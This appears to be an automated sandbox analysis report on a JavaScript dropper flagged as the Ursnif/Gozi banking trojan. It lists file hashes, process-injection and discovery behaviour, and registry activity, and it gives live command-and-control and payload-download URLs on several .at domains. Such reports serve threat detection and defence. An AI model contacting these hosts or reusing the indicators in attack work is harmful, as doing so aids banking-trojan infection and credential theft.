gozi_ifsb | 55a1a3a43322e94c4a2d9363a72aec52b16b7fc591f23601de1cfcb85559558c

Analysis

max time kernel
124s
max time network
84s
platform
windows7_x64
resource
win7v200410
submitted
17-04-2020 22:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

presentation_p1f.js
Size

1.3MB
MD5

5024d780ce83091c9e3ec1501b1cce19
SHA1

4f9c3b9aa21a5a4b638eef3902d26f2f562a0ed5
SHA256

55a1a3a43322e94c4a2d9363a72aec52b16b7fc591f23601de1cfcb85559558c
SHA512

96b888f75ac39d56510f8f3aac763bb32182a69c77f649b6349789d84f848ea2057d54a4b3e72ae3318c47814edb4311c57d93add609eb9e2c0334c3e8f5d2ba

Score

10^/10

banker trojan gozi_ifsb ursnif discovery evasion spyware

Malware Config

Signatures

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
1092	net.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1700	iexplore.exe
1700	iexplore.exe
1764	IEXPLORE.EXE
1764	IEXPLORE.EXE
1700	iexplore.exe
1700	iexplore.exe
1532	IEXPLORE.EXE
1532	IEXPLORE.EXE
1700	iexplore.exe
1700	iexplore.exe
1764	IEXPLORE.EXE
1764	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	1504	tasklist.exe
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE
Token: SeShutdownPrivilege	1272	Explorer.EXE

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1204	powershell.exe
1272	Explorer.EXE
1272	Explorer.EXE
1072	cmd.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2012	PING.EXE

Makes http(s) request 11 IoCs

Contacts server via http/https, possibly for C2 communication.

description	flow	ioc
HTTP URL	6	http://f1.pipen.at/favicon.ico
HTTP URL	7	http://f1.pipen.at/api1/K68PjaUsBMuwec0X/Scvt8a0ZJPL3x_2/Fwg58RikKcgXipQl4k/AApjj1wM7/DtrVApAgokd_2FE1cNyN/zuJfilz6XwXaJAuNvY_/2BP6UGBxs45JpNdQFqlKy1/ZhStWznt8eXTO/KKD1d9ll/1GySJL40U5ySlQ2ljJl6JZW/nvzgOCtNnM/ouN9T9tMP4gdJofG4/QxftHCMR5h3j/NdIGGpWkTMo/els_2FYDxKewwC/zJ71Sa_2FblNn95j5ETbU/KzhH_2BFjLhv6GSy/_0A_0DwP6TgU9Oa/30s1Sn3MCnxJmSVh3h/rF0ZY6VY_2FrUCesP/M1Mng
HTTP URL	8	http://f1.pipen.at/favicon.ico
HTTP URL	21	http://vv.malorun.at/api1/tuXZ_2BzFnY/efpPzPmxgjaLGh/bJwCDZGKkNgRVR_2B9JCY/25eZL6P3FmmxbBet/ML0tosgP1CGuqkv/RiHEN_2F8fftvnsr2o/mVNmo4CQt/nn_2FNIqgBwSW6DFQVWh/eeIN4KWitq_2FIcz7qV/SZhx5o3F_2FmorH_2FnsXz/_2FiUg4HCzBLh/fPXBjHch/4DaITEZbjp5foslikzGSW2O/LhPQnLzDO9/qgFWZRvR9xwsOn1CC/_2BydX_2B5la/GK0EyT7glhV/_2BGakBTBVR4Yw/Z_0A_0DIbEiq92A11koxT/wMWJ4Vwn6_2F2oye/OUnN8LZvao3iwhX7/BQr
HTTP URL	22	http://vv.malorun.at/api1/yFAkqIhYECn0YVG/NsXkt3JRoEdksBRBBv/506FRXKmH/r9q6SrvvduA8cjQ6dxCk/hLPcC4D6Guk4_2FsHtv/VHzQeZH6z2FZerTYU_2F82/hzg9a12JWYdUW/umgYezah/yCo_2FOo5id2wEfzzNzXu0M/X7c431j4Tp/1QQ_2FEE4PetAi6bq/iH2e9eeV4oHD/PCRmnRYj4RE/n_2BWRK6vqyPjf/m2v4GE4HrxKuf09E4l8Y3/1T16_2FURVgcb3ab/vqxjYm2RTvJloGt/W_0A_0DTy8ien16_2B/vWmX_2Bn1/CBADSfpN1tXPHsI9b4XL/GR8gGRGK/cva
HTTP URL	23	http://vv.malorun.at/api1/rhUaJU7kj/hEcoiPEUj45x2ngsc6_2/BcVsMs1_2B_2B1bz_2F/TM_2BnnOZqXnxn3LUZbxRt/TnihpYaos_2Fh/Dicb6LNG/dgrSQmd3RwMTAnrW51_2Bxe/ezOQdtaVbE/fTNQTslR5AhHs6kFq/4EsdM6b3Z5dN/xK6UrcoEnH_/2FgoWgAIwKIa1N/wsX8VOlQo9AreUVoEngU8/g3n2v47Io9bNlMuu/i_2B5SuSn3GjuoO/9ojGfZIW0dA98TSGkK/4GWKw6f4u/n6mfgn_2FsU1F_2BW_0A/_0DvXTRWpGQc_2BVjU7/c_2B96FsxqDKpyEvkd31oF/7qI0pvUj/DwgL_2F
HTTP URL	5	http://f1.pipen.at/api1/_2BFBzq61HZUOXwg/irg6DoSjITJLB9z/EY0iCLpu3TsGvySUyq/XpNaJgRJZ/698JgcoJvAmiQxUAvq9G/6DjQH6lNuBvSvAu9QxJ/IK4DMJxogjm5FuWPFLFo3M/_2FTz6AEgr60C/c8Q4mWRb/Pk6ZP2f1QcjM5kFxdk9e2tM/4qkbmgXUKc/s3Qkk4tMdA616yU7g/dpt_2BsFO5ve/Z4RDSmTmntH/k2qjlRnaIp4ONC/pn1pdhHTA9i8yBVIHEuch/MBQ7A2R92y_0A_0D/EhJ6_2BpQ1JmlG7/rN_2FVOK1l4wz0up8K/Ojji3y5qBAI8d/uBkvG
HTTP URL	9	http://f1.pipen.at/api1/YU1dt2g3/nxZZ7IuqftaZJTOH2USKUFz/b9Co9yVrjl/DAaCt_2BZPOtjCd6F/5skjYQu3ma8b/iL5x9PSEzgV/_2FDZcmCG8Hvr8/kXWp6PU9sUF6sXJZQaVBe/Wi52fsiwMuaEpwf_/2BgkVkSubnvdFdT/b9ReWwVhXVYd1R1_2F/Rj4_2BPz6/qxcrFAJlMEJ5fRJxZl71/GN0gPb67HFUhiU5M2Cc/pbb1_2BQSzC7ReUOBWem2t/BOPy_2BE8pLoO/BQnLceuw/ev09DxOY3_2F_0A_0D_2BKK/Om9gfFNDCq/ZT_2BI9vjNjWfNmrD/wW4qW04_2Fbd/BnqBya280BJ/5SfWGBtFnbTZOt/_2FT6KK
HTTP URL	12	http://api10.dianer.at/jvassets/xI/t64.dat
HTTP URL	26	http://vv.malorun.at/api1/Jb1b1CEZ9OTWq/OYVU1368/syczHAXVBB58_2FnFBfKNH1/42Dt8WVccR/jgYIvYegfdx3htbNJ/KYqfCcexEf4X/CVz4SXi_2BA/Yj_2Fl5UNmpacm/sfX6jzWstBaWUUyiNxrGL/sBoHKBkfvCAd6SRr/KOOKbYBlWF8rjxB/pzzF9x86L3ZmX6OwWU/PZh_2BC_2/FRI0U7YoGdqYRuHx4229/Zf_2FusR6glzRZYnu7u/VbwBPxd3YlnX8tOr8kV4kO/z9gsuJntFEzo9/kni_0A_0/DjdqXRrzeNcZl9JtqHJWDJF/DQCS_2B9Hc/C0z0do_2FWlW/hbkbqTI
HTTP URL	34	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D

Checks for installed software on the system 1 TTPs 37 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1204	powershell.exe
1204	powershell.exe
1272	Explorer.EXE

Modifies Internet Explorer settings 1 TTPs 42 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{88FBFB91-810E-11EA-B452-DE0F7BA4F7CC} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "293935979"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dcc209169d6de14b878908571718e558000000000200000000001066000000010000200000002e79c3165acbbec21918761d3eadf2894471b78b98483b3af4409a9b073510d8000000000e80000000020000200000006aefb2202bdf0b4e7c099708eb781c2b0e9c93d1f909d29e60e844296b344c9e200000007f5e3f0fafad0af76aaf17d4f9573244e4be709838c2959f6a2d264aca16b74a400000007fb0fa7f1302d63986ddaa3f7c0f064ac3b20c73bc5833244e8f63c37123ec72df0b210f0e9d9e8475a31550e5cb4adb4d52d9747f08147550f66845972b4f3e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d051cf511b15d601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dcc209169d6de14b878908571718e558000000000200000000001066000000010000200000005b644fda2f252cff84bea5c3d969084a65e5e46f7b3ae65e8eeffee42ec525aa000000000e80000000020000200000005c18a66a200b05dfae49092c37907ec737bcd6707b4fdcc73579d5eeb51136a4900000002edc9cfde6f238a66230ebb19190ff9b468bb5ef8e193c1b5826da0d19989caa4ca900f7896f90ec95243c7c8d02644eb581a9acbc1e6e3ee17d55c74dfd6f17f87ffb452d2e97af6fa304a87f08a8c8651a5727c1ae45b54a837211cf55fb49e089fbd058505b4692ab605108b90bd0567030ebd57a49f58bd8f3ff8f49bbc66f576a7c42f64c9f0dceac58b25e9d274000000008bbcbc96173b744d66f33d0bd9bba0bdd4955bdea2d3427ad1918ed1793a9ce8986b4b275777b287418542adbb2b9131be9a060197a8930ab0a88b9c9d36796	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe

Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1204 set thread context of 1272	1204	powershell.exe	21
PID 1272 set thread context of 1700	1272	Explorer.EXE	28
PID 1272 set thread context of 1072	1272	Explorer.EXE	41
PID 1072 set thread context of 2012	1072	cmd.exe	43

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Explorer.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1572	systeminfo.exe

Runs net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1504	tasklist.exe

Suspicious use of WriteProcessMemory 99 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 1224	2024	wscript.exe	25
PID 2024 wrote to memory of 1224	2024	wscript.exe	25
PID 2024 wrote to memory of 1224	2024	wscript.exe	25
PID 2024 wrote to memory of 1224	2024	wscript.exe	25
PID 2024 wrote to memory of 1224	2024	wscript.exe	25
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1224 wrote to memory of 1280	1224	regsvr32.exe	26
PID 1700 wrote to memory of 1764	1700	iexplore.exe	30
PID 1700 wrote to memory of 1764	1700	iexplore.exe	30
PID 1700 wrote to memory of 1764	1700	iexplore.exe	30
PID 1700 wrote to memory of 1764	1700	iexplore.exe	30
PID 1700 wrote to memory of 1532	1700	iexplore.exe	32
PID 1700 wrote to memory of 1532	1700	iexplore.exe	32
PID 1700 wrote to memory of 1532	1700	iexplore.exe	32
PID 1700 wrote to memory of 1532	1700	iexplore.exe	32
PID 2040 wrote to memory of 1204	2040	mshta.exe	35
PID 2040 wrote to memory of 1204	2040	mshta.exe	35
PID 2040 wrote to memory of 1204	2040	mshta.exe	35
PID 1204 wrote to memory of 1360	1204	powershell.exe	37
PID 1204 wrote to memory of 1360	1204	powershell.exe	37
PID 1204 wrote to memory of 1360	1204	powershell.exe	37
PID 1360 wrote to memory of 1128	1360	csc.exe	38
PID 1360 wrote to memory of 1128	1360	csc.exe	38
PID 1360 wrote to memory of 1128	1360	csc.exe	38
PID 1204 wrote to memory of 1300	1204	powershell.exe	39
PID 1204 wrote to memory of 1300	1204	powershell.exe	39
PID 1204 wrote to memory of 1300	1204	powershell.exe	39
PID 1300 wrote to memory of 1572	1300	csc.exe	40
PID 1300 wrote to memory of 1572	1300	csc.exe	40
PID 1300 wrote to memory of 1572	1300	csc.exe	40
PID 1204 wrote to memory of 1272	1204	powershell.exe	21
PID 1204 wrote to memory of 1272	1204	powershell.exe	21
PID 1204 wrote to memory of 1272	1204	powershell.exe	21
PID 1272 wrote to memory of 1700	1272	Explorer.EXE	28
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1272 wrote to memory of 1700	1272	Explorer.EXE	28
PID 1272 wrote to memory of 1700	1272	Explorer.EXE	28
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1272 wrote to memory of 1072	1272	Explorer.EXE	41
PID 1072 wrote to memory of 2012	1072	cmd.exe	43
PID 1272 wrote to memory of 1980	1272	Explorer.EXE	44
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	45
PID 1272 wrote to memory of 1980	1272	Explorer.EXE	44
PID 1272 wrote to memory of 1980	1272	Explorer.EXE	44
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	45
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	45
PID 1272 wrote to memory of 324	1272	Explorer.EXE	50
PID 1272 wrote to memory of 324	1272	Explorer.EXE	50
PID 1272 wrote to memory of 324	1272	Explorer.EXE	50
PID 1272 wrote to memory of 600	1272	Explorer.EXE	51
PID 1272 wrote to memory of 600	1272	Explorer.EXE	51
PID 1272 wrote to memory of 600	1272	Explorer.EXE	51
PID 1272 wrote to memory of 1360	1272	Explorer.EXE	54
PID 1272 wrote to memory of 1360	1272	Explorer.EXE	54
PID 1272 wrote to memory of 1360	1272	Explorer.EXE	54
PID 1272 wrote to memory of 1736	1272	Explorer.EXE	58
PID 1272 wrote to memory of 1736	1272	Explorer.EXE	58
PID 1272 wrote to memory of 1736	1272	Explorer.EXE	58
PID 1272 wrote to memory of 1388	1272	Explorer.EXE	60
PID 1272 wrote to memory of 1388	1272	Explorer.EXE	60
PID 1272 wrote to memory of 1388	1272	Explorer.EXE	60
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	63
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	63
PID 1272 wrote to memory of 1968	1272	Explorer.EXE	63
PID 1272 wrote to memory of 2004	1272	Explorer.EXE	65
PID 1272 wrote to memory of 2004	1272	Explorer.EXE	65
PID 1272 wrote to memory of 2004	1272	Explorer.EXE	65
PID 1272 wrote to memory of 812	1272	Explorer.EXE	68
PID 1272 wrote to memory of 812	1272	Explorer.EXE	68
PID 1272 wrote to memory of 812	1272	Explorer.EXE	68
PID 1272 wrote to memory of 1344	1272	Explorer.EXE	70
PID 1272 wrote to memory of 1344	1272	Explorer.EXE	70
PID 1272 wrote to memory of 1344	1272	Explorer.EXE	70
PID 1272 wrote to memory of 1164	1272	Explorer.EXE	73
PID 1272 wrote to memory of 1164	1272	Explorer.EXE	73
PID 1272 wrote to memory of 1164	1272	Explorer.EXE	73
PID 1272 wrote to memory of 1496	1272	Explorer.EXE	75
PID 1272 wrote to memory of 1496	1272	Explorer.EXE	75
PID 1272 wrote to memory of 1496	1272	Explorer.EXE	75
PID 1272 wrote to memory of 1708	1272	Explorer.EXE	78
PID 1272 wrote to memory of 1708	1272	Explorer.EXE	78
PID 1272 wrote to memory of 1708	1272	Explorer.EXE	78
PID 1272 wrote to memory of 1492	1272	Explorer.EXE	80
PID 1272 wrote to memory of 1492	1272	Explorer.EXE	80
PID 1272 wrote to memory of 1492	1272	Explorer.EXE	80
PID 1272 wrote to memory of 1980	1272	Explorer.EXE	83
PID 1272 wrote to memory of 1980	1272	Explorer.EXE	83
